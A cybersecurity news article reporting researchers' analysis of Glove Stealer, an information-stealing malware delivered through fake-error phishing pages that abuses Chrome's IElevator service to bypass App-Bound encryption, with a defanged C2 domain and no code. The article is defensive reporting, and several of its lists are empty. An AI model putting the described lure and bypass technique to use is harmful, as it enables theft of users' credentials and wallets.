Glove Stealer Malware Bypasses Chrome's Encryption Defenses

Cybersecurity researchers from Gen Digital have uncovered a sophisticated new information-stealing malware called Glove Stealer that specifically targets browser data, cryptocurrency wallets, and authentication credentials by exploiting Chrome's IElevator service to bypass App-Bound encryption.

"Glove Stealer represents a concerning evolution in information-stealing malware, combining social engineering tactics with technical sophistication to compromise user data," researchers revealed in a detailed analysis published Tuesday.

The malware, written in .NET, is being distributed through phishing campaigns that mimic ClickFix, a legitimate troubleshooting tool. Users receive HTML attachments containing fake error messages that trick them into executing malicious PowerShell commands.

Example ClickFix HTML page being distributed in phishing email attachments (Image Source: Gen Digital)

What makes Glove Stealer particularly dangerous is its ability to bypass Chrome's App-Bound encryption, introduced in version 127, by exploiting the IElevator service - a technique that was only recently disclosed by security researcher Alexander Hagenah in late October 2024.

The malware's capabilities include:

The infection chain begins with phishing emails containing HTML attachments that display fake error messages. When users follow the "fixing" instructions, they unknowingly execute a malicious script that downloads Glove Stealer from command-and-control (C2) servers like "master.volt-texs[.]online".

To maintain stealth, the malware terminates browser processes for Chrome, Edge, Opera, Brave, and others before extracting sensitive data. It organizes stolen information into categorized directories, encrypting the data using 3DES encryption before exfiltration.

"The malware employs a dedicated supporting module that must be placed in Chrome's Program Files directory to successfully bypass the App-Bound encryption," the researchers explained. "This requires local admin privileges, highlighting the sophisticated nature of the attack."

The stolen data is meticulously organized into specific directories:

The malware also creates a detailed system fingerprint containing information about the victim's operating system, hardware, and user environment.

To protect against Glove Stealer infections, security experts recommend:

The discovery of Glove Stealer highlights the ongoing evolution of information-stealing malware and the importance of maintaining robust security practices, especially as attackers continue to find new ways to bypass modern browser security features.

Researchers have published indicators of compromise (IoCs) and detailed technical analysis to help organizations detect and prevent Glove Stealer infections. The investigation into the malware's distribution networks and potential connections to other cybercrime operations is ongoing.

Visit our website to get cybersecurity updates like this, thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive tips like this. 

You may also like these articles: